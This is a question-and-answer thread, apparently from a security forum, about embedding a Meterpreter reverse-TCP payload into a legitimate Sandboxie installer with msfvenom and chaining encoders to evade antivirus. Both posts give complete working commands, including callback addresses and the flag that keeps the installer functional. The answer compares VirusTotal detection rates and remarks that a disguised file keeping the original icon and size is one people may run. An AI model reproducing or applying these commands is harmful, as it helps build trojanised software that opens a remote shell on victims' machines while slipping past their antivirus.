
I am trying to encode the same executable file multiple times, but I am confused about the syntax.

The Problem:

To encode any executable file we can use the syntax:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=XXX.XXX.XX.X LPORT=XXXX -x /location/of/thefile/filename.exe -k -e x86/shikata_ga_nai -i 10 -f exe > encoded.exe

Now I want to encode some other executable file (or the same file) multiple times using different encoders.
The syntax I am using:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=XXX.XXX.XX.X LPORT=XX -x /location/of/thefile/filename.exe -k -e x86/shikata_ga_nai -i 10 -f raw | msfvenom -a x86 --platform windows -e x86/countdown -i 8 -f raw | msfvenom -a x86 --platform windows -e x86/bloxor -i 9 -f exe -o multiencoded.exe

I found this thread and then implemented the above syntax. But the output file it generates does not include the executable file: the size of the output from the first syntax is 19MB, while from the second syntax it is 76kB.

So my question is: how can I apply multiple encodings to the same executable file?

neferpitou
  • HD Moore, developer of MSF, answers this at the bottom of this page https://community.rapid7.com/thread/7668 – J.A.K. Mar 18 '17 at 17:26
  • I read the same thread and I have linked it in the question also, but it tells how to encode a payload multiple times. But here I am combining a payload with an executable file and then trying to encode it multiple times with different encoders. – neferpitou Mar 18 '17 at 17:42
  • You're right, I read that too quickly. Try looking at the output of each encoding before piping it to the next encoder to see in what stage it gets smaller. Keep in mind though, that encoding multiple times will not improve evasion that much. It's as suspicious as the *last* encoder because of the decoding stub. It might make static analysis harder, but all anyone has to do is run it to dump the contents. – J.A.K. Mar 18 '17 at 21:21
  • Yes, I know it won't change the evasion too much. I was just curious about it. Will update the post soon. – neferpitou Mar 19 '17 at 01:02

1 Answer


As we know, encoding does not help too much in evading AV, but I got some interesting results after trying a few things, and if we know the AV name on the victim machine we can try our luck with this method.

Method one:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.43.163 LPORT=12345 -x /root/Downloads/SandboxieInstall.exe -k -e x86/shikata_ga_nai -i 10 -f exe > encodedsandbox.exe

I used Sandboxie for this method, and it converted the 9MB file to a 17.9MB file. Then I uploaded it on VirusTotal.

[screenshot: VirusTotal results for the encoded file]

From the screenshot you can see that AVs like Avast, eScan and ESET were able to detect it as a trojan. However, only a few AVs did not detect it, as shown below.

[screenshot: VirusTotal results, AVs that did not detect the file]

Now comes the second method, which I asked about in the question, i.e. "Encode an executable file multiple times using msfvenom". Finally, I was able to implement it and found a more exciting result.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.43.163 LPORT=12345 -e x86/shikata_ga_nai -i 10 -f raw > eoncode.bin

msfvenom -p - -x /root/Downloads/SandboxieInstall.exe -k -f exe -a x86 --platform windows -e x86/bloxor -i 2 > sanbox.exe < eoncode.bin

The syntax is a bit different from what I mentioned above in the question, but it worked. The final file it generated was only 17.9MB, the same as the previous file. The new file will act the same as the original software due to the "-k" flag, and the result from VirusTotal was the same as before, but I was successful in what I was trying to implement.

If we remove the "-k" flag from the last syntax it will generate an exe file of 9MB and the icon will be the same as the original software, i.e. Sandboxie, but it will lose its original functionality (after opening the file nothing will happen as we removed the "-k" flag; since it has the same size as the original file, plus the icon also looks the same, people may run it). But when I uploaded it on VirusTotal I found some interesting results, as shown below.

[screenshot: VirusTotal results for the file built without "-k"]

This is just the opposite of the above result.

neferpitou